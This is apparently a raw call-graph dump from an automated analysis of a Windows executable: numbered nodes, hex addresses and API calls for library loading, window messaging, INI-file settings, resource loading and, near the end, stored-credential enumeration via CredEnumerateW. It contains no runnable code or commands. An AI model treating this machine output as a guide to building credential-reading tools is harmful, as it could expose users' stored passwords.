38218->37919 38219->37926 38220->37934 38221->37905 38222->37910 38223->37927 38224->37929 38225->37932 38226->37934 38227->37942 38228->37953 38229->37896 38231 42a175 38230->38231 38233 42a122 38230->38233 38231->38022 38236 42b13b 147 API calls 38231->38236 38233->38231 38234 42a115 147 API calls 38233->38234 38237 43a174 38233->38237 38261 42a0a8 147 API calls 38233->38261 38234->38233 38236->38020 38251 43a196 38237->38251 38252 43a19e 38237->38252 38238 43a306 38238->38251 38281 4388c4 14 API calls 38238->38281 38241 42a115 147 API calls 38241->38252 38243 43a642 38243->38251 38285 4169a7 11 API calls 38243->38285 38247 43a635 38284 42c02e memset 38247->38284 38251->38233 38252->38238 38252->38241 38252->38251 38262 42ff8c 38252->38262 38270 415a91 38252->38270 38274 4165ff 38252->38274 38277 439504 13 API calls 38252->38277 38278 4312d0 147 API calls 38252->38278 38279 42be4c memcpy memcpy memcpy memset memcpy 38252->38279 38280 43a121 11 API calls 38252->38280 38254 4169a7 11 API calls 38255 43a325 38254->38255 38255->38243 38255->38247 38255->38251 38255->38254 38256 42b5b5 memset memcpy 38255->38256 38257 42bf4c 14 API calls 38255->38257 38260 4165ff 11 API calls 38255->38260 38282 42b63e 14 API calls 38255->38282 38283 42bfcf memcpy 38255->38283 38256->38255 38257->38255 38260->38255 38261->38233 38286 43817e 38262->38286 38264 42ff99 38265 42ffe3 38264->38265 38266 42ffd0 38264->38266 38269 42ff9d 38264->38269 38291 4169a7 11 API calls 38265->38291 38290 4169a7 11 API calls 38266->38290 38269->38252 38271 415a9d 38270->38271 38272 415ab3 38271->38272 38273 415aa4 memset 38271->38273 38272->38252 38273->38272 38494 4165a0 38274->38494 38277->38252 38278->38252 38279->38252 38280->38252 38281->38255 38282->38255 38283->38255 38284->38243 38285->38251 38287 438187 38286->38287 38289 438192 38286->38289 38292 4380f6 38287->38292 38289->38264 38290->38269 38291->38269 38294 43811f 38292->38294 38293 438164 38293->38289 38294->38293 38297 437e5e 38294->38297 38320 4300e8 memset memset memcpy 38294->38320 38321 437d3c 38297->38321 38299 437eb3 38299->38294 38300 437ea9 38300->38299 38306 437f22 38300->38306 38336 41f432 38300->38336 38303 437f06 38383 415c56 11 API calls 38303->38383 38305 437f95 38388 415c56 11 API calls 38305->38388 38307 437f7f 38306->38307 38384 432d4e 38306->38384 38307->38305 38310 43802b 38307->38310 38311 4165ff 11 API calls 38310->38311 38312 438054 38311->38312 38347 437371 38312->38347 38315 43806b 38316 438094 38315->38316 38389 42f50e 138 API calls 38315->38389 38318 437fa3 38316->38318 38390 4300e8 memset memset memcpy 38316->38390 38318->38299 38391 41f638 104 API calls 38318->38391 38320->38294 38322 437d69 38321->38322 38325 437d80 38321->38325 38404 437ccb 11 API calls 38322->38404 38324 437d76 38324->38300 38325->38324 38326 437da3 38325->38326 38327 437d90 38325->38327 38392 438460 38326->38392 38327->38324 38408 437ccb 11 API calls 38327->38408 38331 437de8 38407 424f26 123 API calls 38331->38407 38332 437dcb 38332->38331 38405 444283 13 API calls 38332->38405 38334 437dfc 38406 437ccb 11 API calls 38334->38406 38337 41f54d 38336->38337 38343 41f44f 38336->38343 38338 41f466 38337->38338 38438 41c635 memset memset 38337->38438 38338->38303 38338->38306 38343->38338 38345 41f50b 38343->38345 38409 41f1a5 38343->38409 38434 41c06f memcmp 38343->38434 38435 41f3b1 90 API calls 38343->38435 38436 41f398 86 API calls 38343->38436 38345->38337 38345->38338 38437 41c295 86 API calls 38345->38437 38439 41703f 38347->38439 38349 437399 38350 43739d 38349->38350 38353 4373ac 38349->38353 38472 4446ea 11 API calls 38350->38472 38352 4373a7 38352->38315 38446 416935 38353->38446 38355 4373ca 38357 438460 134 API calls 38355->38357 38365 415a91 memset 38355->38365 38368 43758f 38355->38368 38380 437584 38355->38380 38382 437d3c 135 API calls 38355->38382 38454 4251c4 38355->38454 38473 425433 13 API calls 38355->38473 38474 425413 17 API calls 38355->38474 38475 42533e 16 API calls 38355->38475 38476 42538f 16 API calls 38355->38476 38477 42453e 123 API calls 38355->38477 38356 4375bc 38480 415c7d 38356->38480 38357->38355 38363 4375e2 38363->38352 38491 444283 13 API calls 38363->38491 38365->38355 38478 42453e 123 API calls 38368->38478 38369 4375f4 38374 437620 38369->38374 38375 43760b 38369->38375 38373 43759f 38376 416935 16 API calls 38373->38376 38378 416935 16 API calls 38374->38378 38492 444283 13 API calls 38375->38492 38376->38380 38378->38352 38380->38356 38479 42453e 123 API calls 38380->38479 38381 437612 memcpy 38381->38352 38382->38355 38383->38299 38385 432d65 38384->38385 38386 432d58 38384->38386 38385->38307 38493 432cc4 memset memset memcpy 38386->38493 38388->38318 38389->38316 38390->38318 38391->38299 38393 41703f 11 API calls 38392->38393 38394 43847a 38393->38394 38395 43848a 38394->38395 38396 43847e 38394->38396 38398 438270 134 API calls 38395->38398 38397 4446ea 11 API calls 38396->38397 38403 438488 38397->38403 38399 4384aa 38398->38399 38400 424f26 123 API calls 38399->38400 38399->38403 38401 4384bb 38400->38401 38402 438270 134 API calls 38401->38402 38402->38403 38403->38332 38404->38324 38405->38334 38406->38331 38407->38324 38408->38324 38410 41bc3b 101 API calls 38409->38410 38411 41f1b4 38410->38411 38412 41edad 86 API calls 38411->38412 38419 41f282 38411->38419 38413 41f1cb 38412->38413 38414 41f1f5 memcmp 38413->38414 38415 41f20e 38413->38415 38413->38419 38414->38415 38416 41f21b memcmp 38415->38416 38415->38419 38417 41f326 38416->38417 38420 41f23d 38416->38420 38418 41ee6b 86 API calls 38417->38418 38417->38419 38418->38419 38419->38343 38420->38417 38421 41f28e memcmp 38420->38421 38423 41c8df 56 API calls 38420->38423 38421->38417 38422 41f2a9 38421->38422 38422->38417 38425 41f308 38422->38425 38426 41f2d8 38422->38426 38424 41f269 38423->38424 38424->38417 38427 41f287 38424->38427 38428 41f27a 38424->38428 38425->38417 38432 4446ce 11 API calls 38425->38432 38429 41ee6b 86 API calls 38426->38429 38427->38421 38430 41ee6b 86 API calls 38428->38430 38431 41f2e0 38429->38431 38430->38419 38433 41b1ca memset 38431->38433 38432->38417 38433->38419 38434->38343 38435->38343 38436->38343 38437->38337 38438->38338 38440 417044 38439->38440 38441 41705c 38439->38441 38443 416760 11 API calls 38440->38443 38445 417055 38440->38445 38442 417075 38441->38442 38444 41707a 11 API calls 38441->38444 38442->38349 38443->38445 38444->38440 38445->38349 38447 41693e 38446->38447 38451 41698e 38446->38451 38448 41694c 38447->38448 38449 422fd1 memset 38447->38449 38450 4165a0 11 API calls 38448->38450 38448->38451 38449->38448 38452 416972 38450->38452 38451->38355 38452->38451 38453 422b84 15 API calls 38452->38453 38453->38451 38455 424f07 11 API calls 38454->38455 38456 4251e4 38455->38456 38457 4251f7 38456->38457 38458 4251e8 38456->38458 38461 4250f8 127 API calls 38457->38461 38459 4446ea 11 API calls 38458->38459 38460 4251f2 38459->38460 38460->38355 38462 425209 38461->38462 38464 425249 38462->38464 38465 4384e9 135 API calls 38462->38465 38466 424f74 124 API calls 38462->38466 38468 4250f8 127 API calls 38462->38468 38469 425287 38462->38469 38463 415c7d 16 API calls 38463->38460 38467 424ff0 13 API calls 38464->38467 38464->38469 38465->38462 38466->38462 38470 425266 38467->38470 38468->38462 38469->38463 38470->38469 38471 415be9 memcpy 38470->38471 38471->38469 38472->38352 38473->38355 38474->38355 38475->38355 38476->38355 38477->38355 38478->38373 38479->38356 38481 415c81 38480->38481 38483 415c9c 38480->38483 38482 416935 16 API calls 38481->38482 38481->38483 38482->38483 38483->38352 38484 4442e6 38483->38484 38485 4442eb 38484->38485 38488 444303 38484->38488 38486 41707a 11 API calls 38485->38486 38487 4442f2 38486->38487 38487->38488 38489 4446ea 11 API calls 38487->38489 38488->38363 38490 444300 38489->38490 38490->38363 38491->38369 38492->38381 38493->38385 38499 415cfe 38494->38499 38500 41628e 38499->38500 38506 415d23 __aullrem __aulldvrm 38499->38506 38507 416520 38500->38507 38501 4163ca 38513 416422 11 API calls 38501->38513 38503 416172 memset 38503->38506 38504 416422 10 API calls 38504->38506 38505 415cb9 10 API calls 38505->38506 38506->38500 38506->38501 38506->38503 38506->38504 38506->38505 38508 416527 38507->38508 38512 416574 38507->38512 38510 416544 38508->38510 38508->38512 38514 4156aa 11 API calls 38508->38514 38511 416561 memcpy 38510->38511 38510->38512 38511->38512 38512->38252 38513->38500 38514->38510 38515->38024 38516->38030 38517->38040 38518->38042 38519->38039 38520->38043 38521->38042 38522->38047 38523->38049 38524->38051 38525->38053 38526->38055 38527->38057 38528->38059 38529->38066 38530->38069 38531->38073 38532->38074 38533->38077 38534->38077 38535->38089 38536->38089 38537->38095 38538->38088 38541 44080f 38539->38541 38542 4407a1 38539->38542 38541->38066 38549 43dfff memset 38542->38549 38543->38095 38544->38095 38545->38095 38546->38095 38547->38095 38548->38084 38549->38541 38550->38104 38551->38103 38553->38131 38554->38129 38555->38137 38556->38129 38557->38144 38558->38129 38559->38129 38560->38138 38561->38129 38562->38129 38563->38129 38564->38129 38565->38129 38566->38100 38567->38152 38576 4238ad memset memcpy 38568->38576 38570 423ca5 38571 415a91 memset 38570->38571 38572 423cc3 38571->38572 38572->38164 38573->38164 38574->38164 38575->38158 38576->38570 38577 41276d 38578 41277d 38577->38578 38620 4044a4 LoadLibraryW 38578->38620 38580 412785 38581 412789 38580->38581 38628 414b81 38580->38628 38584 4127c8 38634 412465 memset ??2@YAPAXI 38584->38634 38586 4127ea 38646 40ac21 38586->38646 38591 412813 38664 40dd07 memset 38591->38664 38592 412827 38669 40db69 memset 38592->38669 38595 412822 38690 4125b6 ??3@YAXPAX 38595->38690 38597 40ada2 _wcsicmp 38599 41283d 38597->38599 38599->38595 38602 412863 CoInitialize 38599->38602 38674 41268e 38599->38674 38694 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38602->38694 38605 41296f 38696 40b633 38605->38696 38607 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38612 412957 CoUninitialize 38607->38612 38617 4128ca 38607->38617 38612->38595 38613 4128d0 TranslateAcceleratorW 38614 412941 GetMessageW 38613->38614 38613->38617 38614->38612 38614->38613 38615 412909 IsDialogMessageW 38615->38614 38615->38617 38616 4128fd IsDialogMessageW 38616->38614 38616->38615 38617->38613 38617->38615 38617->38616 38618 41292b TranslateMessage DispatchMessageW 38617->38618 38619 41291f IsDialogMessageW 38617->38619 38618->38614 38619->38614 38619->38618 38621 4044f7 38620->38621 38622 4044cf GetProcAddress 38620->38622 38626 404507 MessageBoxW 38621->38626 38627 40451e 38621->38627 38623 4044e8 FreeLibrary 38622->38623 38624 4044df 38622->38624 38623->38621 38625 4044f3 38623->38625 38624->38623 38625->38621 38626->38580 38627->38580 38629 414b8a 38628->38629 38630 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38628->38630 38700 40a804 memset 38629->38700 38630->38584 38633 414b9e GetProcAddress 38633->38630 38635 4124e0 38634->38635 38636 412505 ??2@YAPAXI 38635->38636 38637 41251c 38636->38637 38642 412521 38636->38642 38722 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38637->38722 38711 444722 38642->38711 38645 41259b wcscpy 38645->38586 38727 40b1ab free free 38646->38727 38648 40ad76 38728 40aa04 38648->38728 38651 40a9ce malloc memcpy free free 38654 40ac5c 38651->38654 38652 40ad4b 38652->38648 38751 40a9ce 38652->38751 38654->38648 38654->38651 38654->38652 38655 40ace7 free 38654->38655 38731 40a8d0 38654->38731 38743 4099f4 38654->38743 38655->38654 38659 40a8d0 7 API calls 38659->38648 38660 40ada2 38661 40adc9 38660->38661 38662 40adaa 38660->38662 38661->38591 38661->38592 38662->38661 38663 40adb3 _wcsicmp 38662->38663 38663->38661 38663->38662 38756 40dce0 38664->38756 38666 40dd3a GetModuleHandleW 38761 40dba7 38666->38761 38670 40dce0 3 API calls 38669->38670 38671 40db99 38670->38671 38833 40dae1 38671->38833 38847 402f3a 38674->38847 38676 412766 38676->38595 38676->38602 38677 4126d3 _wcsicmp 38678 4126a8 38677->38678 38678->38676 38678->38677 38680 41270a 38678->38680 38881 4125f8 7 API calls 38678->38881 38680->38676 38850 411ac5 38680->38850 38691 4125da 38690->38691 38692 4125f0 38691->38692 38693 4125e6 DeleteObject 38691->38693 38695 40b1ab free free 38692->38695 38693->38692 38694->38607 38695->38605 38697 40b640 38696->38697 38698 40b639 free 38696->38698 38699 40b1ab free free 38697->38699 38698->38697 38699->38581 38701 40a83b GetSystemDirectoryW 38700->38701 38702 40a84c wcscpy 38700->38702 38701->38702 38707 409719 wcslen 38702->38707 38705 40a881 LoadLibraryW 38706 40a886 38705->38706 38706->38630 38706->38633 38708 409724 38707->38708 38709 409739 wcscat LoadLibraryW 38707->38709 38708->38709 38710 40972c wcscat 38708->38710 38709->38705 38709->38706 38710->38709 38712 444732 38711->38712 38713 444728 DeleteObject 38711->38713 38723 409cc3 38712->38723 38713->38712 38715 412551 38716 4010f9 38715->38716 38717 401130 38716->38717 38718 401134 GetModuleHandleW LoadIconW 38717->38718 38719 401107 wcsncat 38717->38719 38720 40a7be 38718->38720 38719->38717 38721 40a7d2 38720->38721 38721->38645 38721->38721 38722->38642 38726 409bfd memset wcscpy 38723->38726 38725 409cdb CreateFontIndirectW 38725->38715 38726->38725 38727->38654 38729 40aa14 38728->38729 38730 40aa0a free 38728->38730 38729->38660 38730->38729 38732 40a8eb 38731->38732 38733 40a8df wcslen 38731->38733 38734 40a906 free 38732->38734 38735 40a90f 38732->38735 38733->38732 38736 40a919 38734->38736 38737 4099f4 3 API calls 38735->38737 38738 40a932 38736->38738 38739 40a929 free 38736->38739 38737->38736 38741 4099f4 3 API calls 38738->38741 38740 40a93e memcpy 38739->38740 38740->38654 38742 40a93d 38741->38742 38742->38740 38744 409a41 38743->38744 38745 4099fb malloc 38743->38745 38744->38654 38747 409a37 38745->38747 38748 409a1c 38745->38748 38747->38654 38749 409a30 free 38748->38749 38750 409a20 memcpy 38748->38750 38749->38747 38750->38749 38752 40a9e7 38751->38752 38753 40a9dc free 38751->38753 38754 4099f4 3 API calls 38752->38754 38755 40a9f2 38753->38755 38754->38755 38755->38659 38780 409bca GetModuleFileNameW 38756->38780 38758 40dce6 wcsrchr 38759 40dcf5 38758->38759 38760 40dcf9 wcscat 38758->38760 38759->38760 38760->38666 38781 44db70 38761->38781 38765 40dbfd 38784 4447d9 38765->38784 38768 40dc34 wcscpy wcscpy 38810 40d6f5 38768->38810 38769 40dc1f wcscpy 38769->38768 38772 40d6f5 3 API calls 38773 40dc73 38772->38773 38774 40d6f5 3 API calls 38773->38774 38775 40dc89 38774->38775 38776 40d6f5 3 API calls 38775->38776 38777 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38776->38777 38816 40da80 38777->38816 38780->38758 38782 40dbb4 memset memset 38781->38782 38783 409bca GetModuleFileNameW 38782->38783 38783->38765 38785 4447f4 38784->38785 38786 40dc1b 38785->38786 38787 444807 ??2@YAPAXI 38785->38787 38786->38768 38786->38769 38788 44481f 38787->38788 38789 444873 _snwprintf 38788->38789 38790 4448ab wcscpy 38788->38790 38823 44474a 8 API calls 38789->38823 38792 4448bb 38790->38792 38824 44474a 8 API calls 38792->38824 38793 4448a7 38793->38790 38793->38792 38795 4448cd 38825 44474a 8 API calls 38795->38825 38797 4448e2 38826 44474a 8 API calls 38797->38826 38799 4448f7 38827 44474a 8 API calls 38799->38827 38801 44490c 38828 44474a 8 API calls 38801->38828 38803 444921 38829 44474a 8 API calls 38803->38829 38805 444936 38830 44474a 8 API calls 38805->38830 38807 44494b 38831 44474a 8 API calls 38807->38831 38809 444960 ??3@YAXPAX 38809->38786 38811 44db70 38810->38811 38812 40d702 memset GetPrivateProfileStringW 38811->38812 38813 40d752 38812->38813 38814 40d75c WritePrivateProfileStringW 38812->38814 38813->38814 38815 40d758 38813->38815 38814->38815 38815->38772 38817 44db70 38816->38817 38818 40da8d memset 38817->38818 38819 40daac LoadStringW 38818->38819 38822 40dac6 38819->38822 38821 40dade 38821->38595 38822->38819 38822->38821 38832 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38822->38832 38823->38793 38824->38795 38825->38797 38826->38799 38827->38801 38828->38803 38829->38805 38830->38807 38831->38809 38832->38822 38843 409b98 GetFileAttributesW 38833->38843 38835 40daea 38836 40daef wcscpy wcscpy GetPrivateProfileIntW 38835->38836 38842 40db63 38835->38842 38844 40d65d GetPrivateProfileStringW 38836->38844 38838 40db3e 38845 40d65d GetPrivateProfileStringW 38838->38845 38840 40db4f 38846 40d65d GetPrivateProfileStringW 38840->38846 38842->38597 38843->38835 38844->38838 38845->38840 38846->38842 38882 40eaff 38847->38882 38851 411ae2 memset 38850->38851 38852 411b8f 38850->38852 38922 409bca GetModuleFileNameW 38851->38922 38864 411a8b 38852->38864 38854 411b0a wcsrchr 38855 411b22 wcscat 38854->38855 38856 411b1f 38854->38856 38923 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38855->38923 38856->38855 38858 411b67 38924 402afb 38858->38924 38862 411b7f 38980 40ea13 SendMessageW memset SendMessageW 38862->38980 38865 402afb 27 API calls 38864->38865 38866 411ac0 38865->38866 38867 4110dc 38866->38867 38868 41113e 38867->38868 38873 4110f0 38867->38873 39005 40969c LoadCursorW SetCursor 38868->39005 38870 411143 39006 444a54 38870->39006 39009 4032b4 38870->39009 38871 4110f7 _wcsicmp 38871->38873 38872 411157 38874 40ada2 _wcsicmp 38872->38874 38873->38868 38873->38871 39027 410c46 10 API calls 38873->39027 38877 411167 38874->38877 38875 4111af 38877->38875 38878 4111a6 qsort 38877->38878 38878->38875 38881->38678 38883 40eb10 38882->38883 38895 40e8e0 38883->38895 38886 40eb6c memcpy memcpy 38887 40ebb7 38886->38887 38887->38886 38888 40ebf2 ??2@YAPAXI ??2@YAPAXI 38887->38888 38890 40d134 16 API calls 38887->38890 38889 40ec65 38888->38889 38891 40ec2e ??2@YAPAXI 38888->38891 38905 40ea7f 38889->38905 38890->38887 38891->38889 38894 402f49 38894->38678 38896 40e8f2 38895->38896 38897 40e8eb ??3@YAXPAX 38895->38897 38898 40e900 38896->38898 38899 40e8f9 ??3@YAXPAX 38896->38899 38897->38896 38900 40e911 38898->38900 38901 40e90a ??3@YAXPAX 38898->38901 38899->38898 38902 40e931 ??2@YAPAXI ??2@YAPAXI 38900->38902 38903 40e921 ??3@YAXPAX 38900->38903 38904 40e92a ??3@YAXPAX 38900->38904 38901->38900 38902->38886 38903->38904 38904->38902 38906 40aa04 free 38905->38906 38907 40ea88 38906->38907 38908 40aa04 free 38907->38908 38909 40ea90 38908->38909 38910 40aa04 free 38909->38910 38911 40ea98 38910->38911 38912 40aa04 free 38911->38912 38913 40eaa0 38912->38913 38914 40a9ce 4 API calls 38913->38914 38915 40eab3 38914->38915 38916 40a9ce 4 API calls 38915->38916 38917 40eabd 38916->38917 38918 40a9ce 4 API calls 38917->38918 38919 40eac7 38918->38919 38920 40a9ce 4 API calls 38919->38920 38921 40ead1 38920->38921 38921->38894 38922->38854 38923->38858 38981 40b2cc 38924->38981 38926 402b0a 38927 40b2cc 27 API calls 38926->38927 38928 402b23 38927->38928 38929 40b2cc 27 API calls 38928->38929 38930 402b3a 38929->38930 38931 40b2cc 27 API calls 38930->38931 38932 402b54 38931->38932 38933 40b2cc 27 API calls 38932->38933 38934 402b6b 38933->38934 38935 40b2cc 27 API calls 38934->38935 38936 402b82 38935->38936 38937 40b2cc 27 API calls 38936->38937 38938 402b99 38937->38938 38939 40b2cc 27 API calls 38938->38939 38940 402bb0 38939->38940 38941 40b2cc 27 API calls 38940->38941 38942 402bc7 38941->38942 38943 40b2cc 27 API calls 38942->38943 38944 402bde 38943->38944 38945 40b2cc 27 API calls 38944->38945 38946 402bf5 38945->38946 38947 40b2cc 27 API calls 38946->38947 38948 402c0c 38947->38948 38949 40b2cc 27 API calls 38948->38949 38950 402c23 38949->38950 38951 40b2cc 27 API calls 38950->38951 38952 402c3a 38951->38952 38953 40b2cc 27 API calls 38952->38953 38954 402c51 38953->38954 38955 40b2cc 27 API calls 38954->38955 38956 402c68 38955->38956 38957 40b2cc 27 API calls 38956->38957 38958 402c7f 38957->38958 38959 40b2cc 27 API calls 38958->38959 38960 402c99 38959->38960 38961 40b2cc 27 API calls 38960->38961 38962 402cb3 38961->38962 38963 40b2cc 27 API calls 38962->38963 38964 402cd5 38963->38964 38965 40b2cc 27 API calls 38964->38965 38966 402cf0 38965->38966 38967 40b2cc 27 API calls 38966->38967 38968 402d0b 38967->38968 38969 40b2cc 27 API calls 38968->38969 38970 402d26 38969->38970 38971 40b2cc 27 API calls 38970->38971 38972 402d3e 38971->38972 38973 40b2cc 27 API calls 38972->38973 38974 402d59 38973->38974 38975 40b2cc 27 API calls 38974->38975 38976 402d78 38975->38976 38977 40b2cc 27 API calls 38976->38977 38978 402d93 38977->38978 38979 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38978->38979 38979->38862 38980->38852 38984 40b58d 38981->38984 38983 40b2d1 38983->38926 38985 40b5a4 GetModuleHandleW FindResourceW 38984->38985 38986 40b62e 38984->38986 38987 40b5c2 LoadResource 38985->38987 38989 40b5e7 38985->38989 38986->38983 38988 40b5d0 SizeofResource LockResource 38987->38988 38987->38989 38988->38989 38989->38986 38997 40afcf 38989->38997 38991 40b608 memcpy 39000 40b4d3 memcpy 38991->39000 38993 40b61e 39001 40b3c1 18 API calls 38993->39001 38995 40b626 39002 40b04b 38995->39002 38998 40b04b ??3@YAXPAX 38997->38998 38999 40afd7 ??2@YAPAXI 38998->38999 38999->38991 39000->38993 39001->38995 39003 40b051 ??3@YAXPAX 39002->39003 39004 40b05f 39002->39004 39003->39004 39004->38986 39005->38870 39007 444a64 FreeLibrary 39006->39007 39008 444a83 39006->39008 39007->39008 39008->38872 39010 4032c4 39009->39010 39011 40b633 free 39010->39011 39012 403316 39011->39012 39028 44553b 39012->39028 39016 403480 39226 40368c 15 API calls 39016->39226 39018 403489 39019 40b633 free 39018->39019 39021 403495 39019->39021 39020 40333c 39020->39016 39022 4033a9 memset memcpy 39020->39022 39023 4033ec wcscmp 39020->39023 39224 4028e7 11 API calls 39020->39224 39225 40f508 6 API calls 39020->39225 39021->38872 39022->39020 39022->39023 39023->39020 39026 403421 _wcsicmp 39026->39020 39027->38873 39029 445548 39028->39029 39030 445599 39029->39030 39227 40c768 39029->39227 39031 4455a8 memset 39030->39031 39038 4457f2 39030->39038 39310 403988 39031->39310 39041 445854 39038->39041 39412 403e2d memset memset memset memset memset 39038->39412 39039 4455e5 39050 445672 39039->39050 39055 44560f 39039->39055 39040 4458bb memset memset 39043 414c2e 17 API calls 39040->39043 39094 4458aa 39041->39094 39435 403c9c memset memset memset memset memset 39041->39435 39046 4458f9 39043->39046 39045 44595e memset memset 39053 414c2e 17 API calls 39045->39053 39054 40b2cc 27 API calls 39046->39054 39048 44558c 39294 444b06 39048->39294 39049 44557a 39049->39048 39508 4136c0 CoTaskMemFree 39049->39508 39321 403fbe memset memset memset memset memset 39050->39321 39051 445a00 memset memset 39458 414c2e 39051->39458 39052 445b22 39058 445bca 39052->39058 39059 445b38 memset memset memset 39052->39059 39063 44599c 39053->39063 39065 445909 39054->39065 39067 4087b3 338 API calls 39055->39067 39057 445849 39524 40b1ab free free 39057->39524 39066 445c8b memset memset 39058->39066 39132 445cf0 39058->39132 39070 445bd4 39059->39070 39071 445b98 39059->39071 39064 40b2cc 27 API calls 39063->39064 39078 4459ac 39064->39078 39075 409d1f 6 API calls 39065->39075 39079 414c2e 17 API calls 39066->39079 39076 445621 39067->39076 39068 44589f 39525 40b1ab free free 39068->39525 39069 445585 39085 414c2e 17 API calls 39070->39085 39071->39070 39081 445ba2 39071->39081 39074 403335 39223 4452e5 45 API calls 39074->39223 39089 445919 39075->39089 39510 4454bf 20 API calls 39076->39510 39077 445823 39077->39057 39099 4087b3 338 API calls 39077->39099 39090 409d1f 6 API calls 39078->39090 39091 445cc9 39079->39091 39597 4099c6 wcslen 39081->39597 39082 4456b2 39512 40b1ab free free 39082->39512 39084 40b2cc 27 API calls 39095 445a4f 39084->39095 39086 445be2 39085->39086 39097 40b2cc 27 API calls 39086->39097 39087 445d3d 39117 40b2cc 27 API calls 39087->39117 39088 445d88 memset memset memset 39100 414c2e 17 API calls 39088->39100 39526 409b98 GetFileAttributesW 39089->39526 39101 4459bc 39090->39101 39102 409d1f 6 API calls 39091->39102 39092 445879 39092->39068 39113 4087b3 338 API calls 39092->39113 39094->39040 39118 44594a 39094->39118 39474 409d1f wcslen wcslen 39095->39474 39107 445bf3 39097->39107 39099->39077 39110 445dde 39100->39110 39593 409b98 GetFileAttributesW 39101->39593 39112 445ce1 39102->39112 39103 445bb3 39600 445403 memset 39103->39600 39104 445680 39104->39082 39344 4087b3 memset 39104->39344 39116 409d1f 6 API calls 39107->39116 39108 445928 39108->39118 39527 40b6ef 39108->39527 39119 40b2cc 27 API calls 39110->39119 39617 409b98 GetFileAttributesW 39112->39617 39113->39092 39115 40b2cc 27 API calls 39124 445a94 39115->39124 39126 445c07 39116->39126 39127 445d54 _wcsicmp 39117->39127 39118->39045 39131 4459ed 39118->39131 39130 445def 39119->39130 39120 4459cb 39120->39131 39140 40b6ef 253 API calls 39120->39140 39479 40ae18 39124->39479 39125 44566d 39125->39038 39395 413d4c 39125->39395 39136 445389 259 API calls 39126->39136 39137 445d71 39127->39137 39200 445d67 39127->39200 39129 445665 39511 40b1ab free free 39129->39511 39138 409d1f 6 API calls 39130->39138 39131->39051 39131->39052 39132->39074 39132->39087 39132->39088 39133 445389 259 API calls 39133->39058 39142 445c17 39136->39142 39618 445093 23 API calls 39137->39618 39145 445e03 39138->39145 39140->39131 39141 4456d8 39147 40b2cc 27 API calls 39141->39147 39148 40b2cc 27 API calls 39142->39148 39144 44563c 39144->39129 39150 4087b3 338 API calls 39144->39150 39619 409b98 GetFileAttributesW 39145->39619 39146 40b6ef 253 API calls 39146->39074 39152 4456e2 39147->39152 39153 445c23 39148->39153 39149 445d83 39149->39074 39150->39144 39513 413fa6 _wcsicmp _wcsicmp 39152->39513 39157 409d1f 6 API calls 39153->39157 39155 445e12 39162 445e6b 39155->39162 39169 40b2cc 27 API calls 39155->39169 39160 445c37 39157->39160 39158 445aa1 39161 445b17 39158->39161 39176 445ab2 memset 39158->39176 39189 409d1f 6 API calls 39158->39189 39486 40add4 39158->39486 39491 445389 39158->39491 39500 40ae51 39158->39500 39159 4456eb 39165 4456fd memset memset memset memset 39159->39165 39166 4457ea 39159->39166 39167 445389 259 API calls 39160->39167 39594 40aebe 39161->39594 39621 445093 23 API calls 39162->39621 39514 409c70 wcscpy wcsrchr 39165->39514 39517 413d29 39166->39517 39172 445c47 39167->39172 39173 445e33 39169->39173 39170 445e7e 39175 445f67 39170->39175 39178 40b2cc 27 API calls 39172->39178 39179 409d1f 6 API calls 39173->39179 39184 40b2cc 27 API calls 39175->39184 39180 40b2cc 27 API calls 39176->39180 39182 445c53 39178->39182 39183 445e47 39179->39183 39180->39158 39181 409c70 2 API calls 39185 44577e 39181->39185 39186 409d1f 6 API calls 39182->39186 39620 409b98 GetFileAttributesW 39183->39620 39188 445f73 39184->39188 39190 409c70 2 API calls 39185->39190 39191 445c67 39186->39191 39193 409d1f 6 API calls 39188->39193 39189->39158 39194 44578d 39190->39194 39195 445389 259 API calls 39191->39195 39192 445e56 39192->39162 39198 445e83 memset 39192->39198 39196 445f87 39193->39196 39194->39166 39202 40b2cc 27 API calls 39194->39202 39195->39058 39624 409b98 GetFileAttributesW 39196->39624 39201 40b2cc 27 API calls 39198->39201 39200->39074 39200->39146 39203 445eab 39201->39203 39204 4457a8 39202->39204 39205 409d1f 6 API calls 39203->39205 39206 409d1f 6 API calls 39204->39206 39207 445ebf 39205->39207 39208 4457b8 39206->39208 39209 40ae18 9 API calls 39207->39209 39516 409b98 GetFileAttributesW 39208->39516 39219 445ef5 39209->39219 39211 4457c7 39211->39166 39213 4087b3 338 API calls 39211->39213 39212 40ae51 9 API calls 39212->39219 39213->39166 39214 445f5c 39216 40aebe FindClose 39214->39216 39215 40add4 2 API calls 39215->39219 39216->39175 39217 40b2cc 27 API calls 39217->39219 39218 409d1f 6 API calls 39218->39219 39219->39212 39219->39214 39219->39215 39219->39217 39219->39218 39221 445f3a 39219->39221 39622 409b98 GetFileAttributesW 39219->39622 39623 445093 23 API calls 39221->39623 39223->39020 39224->39026 39225->39020 39226->39018 39228 40c775 39227->39228 39625 40b1ab free free 39228->39625 39230 40c788 39626 40b1ab free free 39230->39626 39232 40c790 39627 40b1ab free free 39232->39627 39234 40c798 39235 40aa04 free 39234->39235 39236 40c7a0 39235->39236 39628 40c274 memset 39236->39628 39241 40a8ab 9 API calls 39242 40c7c3 39241->39242 39243 40a8ab 9 API calls 39242->39243 39244 40c7d0 39243->39244 39657 40c3c3 39244->39657 39248 40c877 39257 40bdb0 39248->39257 39249 40c86c 39699 4053fe 39 API calls 39249->39699 39255 40c7e5 39255->39248 39255->39249 39256 40c634 50 API calls 39255->39256 39682 40a706 39255->39682 39256->39255 39928 404363 39257->39928 39260 40bf5d 39948 40440c 39260->39948 39261 40bdee 39261->39260 39265 40b2cc 27 API calls 39261->39265 39262 40bddf CredEnumerateW 39262->39261 39266 40be02 wcslen 39265->39266 39266->39260 39273 40be1e 39266->39273 39267 40be26 wcsncmp 39267->39273 39270 40be7d memset 39271 40bea7 memcpy 39270->39271 39270->39273 39272 40bf11 wcschr 39271->39272 39271->39273 39272->39273 39273->39260 39273->39267 39273->39270 39273->39271 39273->39272 39274 40b2cc 27 API calls 39273->39274 39276 40bf43 LocalFree 39273->39276 39951 